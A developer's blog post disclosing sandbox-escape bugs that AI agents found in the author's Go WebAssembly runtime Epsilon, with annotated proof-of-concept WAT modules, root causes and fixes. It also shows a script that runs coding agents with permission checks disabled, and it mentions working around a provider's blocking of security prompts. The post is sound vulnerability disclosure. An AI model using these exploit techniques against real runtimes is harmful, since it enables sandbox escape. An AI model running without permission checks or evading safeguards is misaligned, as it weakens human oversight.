All the bugs they found

Last year I wrote a small WASM runtime in Go, Epsilon. As far as runtimes go, this is a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code. It is also very extensively tested against the official WASM testsuite.

Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code.

How many security vulnerabilities do you think AI agents found in it?

More than 20.

Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere.

A handful, though, were properly interesting: sandbox escapes that let a malicious WASM module break out of its isolation and reach into another module's private state. These are my favorites.

Background

A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported (and imported) objects. Unexported functions, memories, etc., are private to the module that defined them.

WASM is a typed stack machine, but the type checking does not happen at runtime: before execution, a validator walks the bytecode and verifies that at every point the values on the stack have the expected types. For example, a module that tried to local.set an i32 into a funcref local would be rejected before it ever started running. Epsilon then executes blindly, trusting the validator's earlier checks.

Thanks to the type guarantees provided by the validator, a funcref at runtime in Epsilon is represented as an int32: -1 is the null sentinel, and any non-negative value is an index into the global function store, shared across all modules instantiated in the runtime. As a result, the constant 0 and a funcref pointing to the first function in the store are indistinguishable during execution. This simplifies the implementation and improves performance, at the cost of delegating safety entirely to the validator.
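To make the ambiguity concrete, here is a minimal sketch of that representation. It is not Epsilon's code: nullFuncRef, store, and resolve are hypothetical names, and the function store is reduced to a slice of names.

```go
package main

import "fmt"

// nullFuncRef mirrors the null sentinel described above (hypothetical name).
const nullFuncRef int32 = -1

// store stands in for the runtime-wide function store; each entry is
// reduced to a name for illustration.
var store = []string{"$secret", "$exploit"}

// resolve interprets a raw stack value as a funcref. It cannot tell
// whether the value was pushed as a funcref or as a plain i32.
func resolve(raw int32) (string, bool) {
	if raw == nullFuncRef {
		return "", false
	}
	if raw < 0 || int(raw) >= len(store) {
		return "", false
	}
	return store[raw], true
}

func main() {
	fromConst := int32(0)   // what `i32.const 0` leaves on the stack
	fromFuncRef := int32(0) // a funcref to the first function in the store

	name, ok := resolve(fromConst)
	fmt.Println(fromConst == fromFuncRef, name, ok) // true $secret true

	_, ok = resolve(nullFuncRef)
	fmt.Println(ok) // false
}
```

Nothing in the raw value records where it came from, so any integer that reaches a funcref slot is treated as a valid store index.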

Each attacker module in the following sections runs alongside the same victim module:

(module
  (func $secret (result i32)   ;; declares a function $secret: takes no parameters,
                               ;; returns a 32-bit integer. Private, never exported
    i32.const 1337             ;; pushes 1337 onto the stack; becomes the return value
  )
)

Since $secret is the first function instantiated into the runtime, it lives at store index 0. The goal of each attacker module is to get the VM to call it, returning 1337, despite never being given a legitimate funcref to it.

1. Zero Is Not Null

The simplest of the three. Here's the attacker:

(module
  (type $t (func (result i32)))   ;; the call_indirect type signature
  (table 1 funcref)               ;; a table of size 1 (essentially an array of funcrefs).
                                  ;; Identified by its module-level index, which is 0
                                  ;; here since it's the first (and only) table declared

  (func (export "exploit") (result i32)
    (local $f funcref)            ;; declared, never assigned;
                                  ;; per spec, ref locals default to null

    i32.const 0                   ;; the slot in the table where we'll write
                                  ;; stack: [0]
    local.get $f                  ;; push $f's value (null)
                                  ;; stack: [0, null]
    table.set 0                   ;; immediate 0 picks which table to write to
                                  ;; (tables[0]); pops two values from the stack:
                                  ;; first the funcref (null), then the slot index.
                                  ;; Writes tables[0][0] = null
                                  ;; stack: []

    i32.const 0                   ;; the slot in the table to fetch from next
                                  ;; stack: [0]
    call_indirect (type $t)       ;; pop the slot, fetch tables[0][slot] (null),
                                  ;; and call it
  )
)

The exploit function, while perfectly valid WASM, should trap at runtime. The local $f is never assigned, so it holds its default value, null, and call_indirect on a null table entry must fail.

Except that in Epsilon, it didn't. It called $secret instead.

The culprit was how locals were initialized. When a function is called, the spec requires locals to be initialized to their default values: zero for numeric and vector types, but null for reference types. Epsilon achieved this by zeroing all non-parameter locals using Go's clear():

// Clear non-parameter locals to their zero values.
clear(locals[numParams:])

This was idiomatic and fast, but clear() sets every element to its Go zero value, which for these locals is 0. Per our funcref representation, that's not null (-1): it's the store index of $secret. When exploit was called, rather than trapping on a null call_indirect, the VM called the function at store index 0.

Fixed. Repro.
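For illustration, a type-aware initialization could look roughly like the sketch below. This is not necessarily how Epsilon fixed it: valType, nullRef, and initLocals are hypothetical names, and locals are assumed to be stored as a flat []int32.

```go
package main

import "fmt"

// valType is a hypothetical tag for a local's declared type.
type valType uint8

const (
	typeI32 valType = iota
	typeFuncRef
)

// nullRef is the null sentinel from the funcref representation above.
const nullRef int32 = -1

// initLocals writes the spec-mandated default into each non-parameter
// local: 0 for numeric locals, the null sentinel for reference locals.
func initLocals(locals []int32, types []valType, numParams int) {
	for i := numParams; i < len(locals); i++ {
		if types[i] == typeFuncRef {
			locals[i] = nullRef
		} else {
			locals[i] = 0
		}
	}
}

func main() {
	// One i32 parameter followed by an i32 local and a funcref local.
	types := []valType{typeI32, typeI32, typeFuncRef}

	buggy := []int32{7, 99, 99}
	clear(buggy[1:]) // zeroes everything, including the funcref local

	fixed := []int32{7, 99, 99}
	initLocals(fixed, types, 1)

	fmt.Println(buggy, fixed) // [7 0 0] [7 0 -1]
}
```

The per-local branch costs a little more than a bulk clear(), which is the trade-off for not conflating "zero" with "null".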

2. Phantom Block Parameter

This one combines two separate bugs:

(module
  (type $t (func (result i32)))
  (table 1 funcref)

  (func (export "exploit") (result i32)
    (local $f funcref)

    ref.null func               ;; push a null funcref onto the stack
    i32.const 0

    (block (param i32)          ;; block consumes the i32 from the stack...
      drop                      ;; ...and immediately drops it
    )

    local.set $f                ;; store top of stack into $f (the null funcref)
    local.get $f
    ref.is_null                 ;; is $f null?

    if (result i32)
      i32.const 42              ;; expected path: $f was null, return 42
    else                        ;; unreachable path: $f is always null
      i32.const 0
      local.get $f
      table.set 0
      i32.const 0
      call_indirect (type $t)
    end
  )
)

In any correct WASM implementation (and indeed in the latest version of Epsilon), exploit returns 42, as expected. In the vulnerable version of Epsilon, it returned 1337 instead.

Stack Height Misalignment

During their execution, control-flow blocks (block, loop, if) may consume inputs from the stack and produce results on it. At the end of execution the stack must look exactly as the block's signature describes: N_params consumed, N_results pushed in their place. Anything the body left in between has to be discarded, so the runtime needs to know how high the stack was when entering the block.

In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack:

vm.pushControlFrame(frame, controlFrame{
    stackHeight: vm.stack.size(),   // height at block entry
    // ...
})

But here lies the first bug: that line captures the stack height after the block's parameters are already pushed. In WASM, parameters are consumed by the block: they belong to the block, not to the surrounding scope. So the validator and the VM now disagree by exactly N parameters about where "the bottom of the block" is on the stack.
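A sketch of the arithmetic the validator expects, assuming the VM knows the block's parameter count when it pushes the control frame. blockEntryHeight is a hypothetical helper, not a function from Epsilon:

```go
package main

import "fmt"

// blockEntryHeight returns the height a block should unwind to: the
// current stack height minus the parameters the block consumes.
func blockEntryHeight(stackSize, numParams uint32) (uint32, error) {
	if numParams > stackSize {
		return 0, fmt.Errorf("block wants %d params, stack holds %d", numParams, stackSize)
	}
	return stackSize - numParams, nil
}

func main() {
	// The stack is [null_funcref, 0] when `(block (param i32) ...)` is entered.
	h, err := blockEntryHeight(2, 1)
	fmt.Println(h, err) // 1 <nil>
}
```

With the parameter subtracted, the VM and the validator agree that the block's floor sits just above the null funcref.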

Memory Resurrection

When a block ends, the VM calls unwind to restore the stack to its declared, pre-block height. targetHeight is the stack height recorded in the controlFrame structure.

func (s *valueStack) unwind(targetHeight, preserveCount uint32) {
    valuesToPreserve := s.data[s.size()-preserveCount:]
    s.data = s.data[:targetHeight]
    s.data = append(s.data, valuesToPreserve...)
}

Because of the stack height misalignment bug above, targetHeight is too high: it counts the block's parameters as if they were still on the stack. Therefore s.data[:targetHeight] causes the slice to grow back rather than be truncated. As long as targetHeight <= cap(s.data), Go is happy to re-expose whatever was sitting in the backing array.

Parameters that the validator considered consumed are now resurrected on top of the stack.
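The resurrection is plain Go slice semantics and can be reproduced without any VM. The sketch below shows it on a bare []int32, followed by a defensive variant of unwind that refuses to grow the stack. unwindChecked is a hypothetical function written for this example, not Epsilon's fix.

```go
package main

import "fmt"

// unwindChecked truncates data to targetHeight and re-appends the top
// preserveCount values. Unlike a bare reslice, it never grows the stack.
func unwindChecked(data []int32, targetHeight, preserveCount int) ([]int32, error) {
	if preserveCount > len(data) || targetHeight > len(data)-preserveCount {
		return nil, fmt.Errorf("unwind to %d (preserving %d) exceeds stack of %d",
			targetHeight, preserveCount, len(data))
	}
	preserved := data[len(data)-preserveCount:]
	return append(data[:targetHeight], preserved...), nil
}

func main() {
	stack := make([]int32, 0, 8)
	stack = append(stack, -1, 0) // [null_funcref, 0]
	stack = stack[:1]            // drop: [null_funcref]

	// Reslicing past len is legal as long as it stays within cap, and it
	// re-exposes whatever the backing array still holds.
	grown := stack[:2]
	fmt.Println(len(stack), grown) // 1 [-1 0]

	_, err := unwindChecked(stack, 2, 0)
	fmt.Println(err != nil) // true
}
```

A check like this would not have fixed the misrecorded height, but it would have turned a silent type confusion into an immediate error.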

Bugs Collide

Let's walk through the exploit function with both bugs in mind:

(func (export "exploit") (result i32)
  (local $f funcref)

  ref.null func        ;; stack: [null_funcref]
  i32.const 0          ;; 0 is the index where $secret happens to sit in the
                       ;; global function store, since it was the very first
                       ;; function instantiated
                       ;; stack: [null_funcref, 0]

  (block (param i32)   ;; bug #1: VM records stackHeight = 2; the validator,
                       ;; treating the i32 as consumed (per spec), records 1
    drop               ;; pops and discards the top of the stack (the 0)
                       ;; stack: [null_funcref]
  )                    ;; bug #2: `end` calls unwind, which sets s.data to
                       ;; s.data[:2], so len 1 grows back to 2, and the 0 we
                       ;; dropped resurrects on top. The top is now an int32
                       ;; of value 0, but the validator still thinks it's a
                       ;; funcref
                       ;; stack: [null_funcref, 0]

  local.set $f         ;; 0 is put in $f, which should be a funcref. Since
                       ;; Epsilon's internal representation of funcref is also
                       ;; an int32, this works at runtime
  local.get $f         ;; stack: [null_funcref, 0]
  ref.is_null          ;; null is -1, so 0 isn't null; pops the funcref and
                       ;; pushes 0 (false). The top of the stack visually
                       ;; still looks like 0, but its type changed from
                       ;; funcref to i32
                       ;; stack: [null_funcref, 0 (i32 false)]

  if (result i32)      ;; pops the i32 condition (0, false), so the else
                       ;; branch fires
                       ;; stack: [null_funcref]
    i32.const 42       ;; not taken
  else
    i32.const 0        ;; the slot index for the upcoming table.set
                       ;; stack: [null_funcref, 0]
    local.get $f       ;; the funcref value to store (actually the int32 0)
                       ;; stack: [null_funcref, 0, 0]
    table.set 0        ;; pops the funcref then the slot index; both are 0,
                       ;; so tables[0][0] now holds the integer 0 dressed as
                       ;; a funcref
                       ;; stack: [null_funcref]
    i32.const 0        ;; the slot index within the table to look up
                       ;; stack: [null_funcref, 0]
    call_indirect (type $t)
                       ;; pops the slot index, fetches tables[0][0] (our
                       ;; int 0 dressed as a funcref), which points at
                       ;; store[0] = $secret. Call it.
  end
)

A perfectly valid WASM module just called an unexported function from another module. By choosing a different integer, it could reach any private function in Epsilon's global store.

Fixed. Repro.

3. Ghost in the Stack

The first two exploits relied on the validator and VM disagreeing about values on the stack inside the sandbox. This one shifts category: the disagreement is between a host function's declared signature and what it actually returns at runtime.

(module
  (type $t (func (result i32)))
  (import "env" "leak" (func $leak (result funcref)))   ;; the host must provide env.leak
  (table 1 funcref)

  (func (export "exploit") (result i32)
    i32.const 0          ;; slot index within the table
    i32.const 0          ;; index of $secret in the global function store

    call $leak           ;; declared to return a funcref; the validator thinks
                         ;; the stack gains one new value after this call

    table.set 0          ;; store the "result" (actually our 0) into the table
    i32.const 0
    call_indirect (type $t)
    return
  )
)

For this exploit to land, the host needs to provide a function env.leak whose runtime behavior diverges from its signature: one that returns fewer results than promised.

In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature:

res := fun.hostCode(fun.module, args...)
vm.stack.pushAll(res)

If leak returned an empty slice instead of the promised funcref, pushAll did nothing. The validator believed a funcref had been pushed. Instead, the stack was unchanged.

The two 0s pushed before $leak were still on the stack. The VM ran table.set 0 and popped them: one as the funcref, one as the slot index. tables[0][0] now held the integer 0. call_indirect fetched it and happily called the function at index 0, $secret.

Fixed. Repro.

Methodology

I used a combination of approaches to find these bugs, starting with a script similar to the one described in the Black-hat LLMs talk:

#!/bin/bash

# Directory to store vulnerability reports
VULN_DIR="vulnerabilities"
mkdir -p "$VULN_DIR"

# List of areas to investigate
AREAS=(
    "epsilon/parser.go"
    "epsilon/validation.go"
    "epsilon/vm.go"
    "epsilon/memory.go"
    "epsilon/imports.go"
    "wasip1/wasi_resources.go"
    "wasip1/wasi_poll.go"
    "wasip1/wasi_unix.go"
)

PROMPT_TEMPLATE="You are an expert security researcher and exploit developer.

STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN_DIR/' directory. Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes in '$VULN_DIR/' only.

Your task is to objectively investigate the following file for security vulnerabilities: %s

Explore the file and any related files, data structures, or interactions it depends on. Where relevant, check behavior against the WebAssembly 2.0 specification (https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf) and the WASI Preview 1 specification — a deviation from spec in security-sensitive code is itself a vulnerability. Do not flag missing features from specs beyond WebAssembly 2.0.

Do not assume a vulnerability exists. If after thorough investigation you find nothing exploitable, state so clearly and stop.

If you confirm a vulnerability:
1. Create a dedicated directory: '$VULN_DIR/<vulnerability_name>/'
2. Write 'README.md' with: root cause, impact, and reproduction steps
3. Write a PoC exploit: a concrete, runnable demonstration (Go test, .wasm file, or script) that proves the vulnerability is triggerable by a malicious WebAssembly module without any special host configuration"

# Get agent from command line, default to claude
AGENT=${1:-claude}

if [ "$AGENT" == "claude" ]; then
    AGENT_CMD="claude --dangerously-skip-permissions"
elif [ "$AGENT" == "gemini" ]; then
    AGENT_CMD="gemini --yolo"
elif [ "$AGENT" == "vibe" ]; then
    AGENT_CMD="vibe --trust"
else
    echo "Usage: $0 [claude|gemini|vibe]"
    exit 1
fi

for AREA in "${AREAS[@]}"; do
    echo "--------------------------------------------------"
    echo "Starting investigation of area: $AREA using $AGENT"
    echo "--------------------------------------------------"

    CURRENT_PROMPT=$(printf "$PROMPT_TEMPLATE" "$AREA")

    $AGENT_CMD -p "$CURRENT_PROMPT"

    echo "Finished investigation of $AREA."
    echo "Sleeping for 10 seconds to respect rate limits..."
    sleep 10
done

Then I moved to a skill instead, which is slightly more convenient.

I'm honestly not sure which one is better, as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise for the reader.

To work around token limits, I also used a variety of models, mainly:

  • Gemini 3 Flash
  • Gemini 3.1 Pro
  • Opus 4.7

Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning.

Trying to work around Anthropic blocking security-related prompts does get pretty tiring though.

Closing thoughts

Epsilon is a weekend hobby project, so I went in expecting agents to find something. It was still astonishing to see some of these issues. Bug #2 in particular is pretty cool.

Please update to version 0.1.0.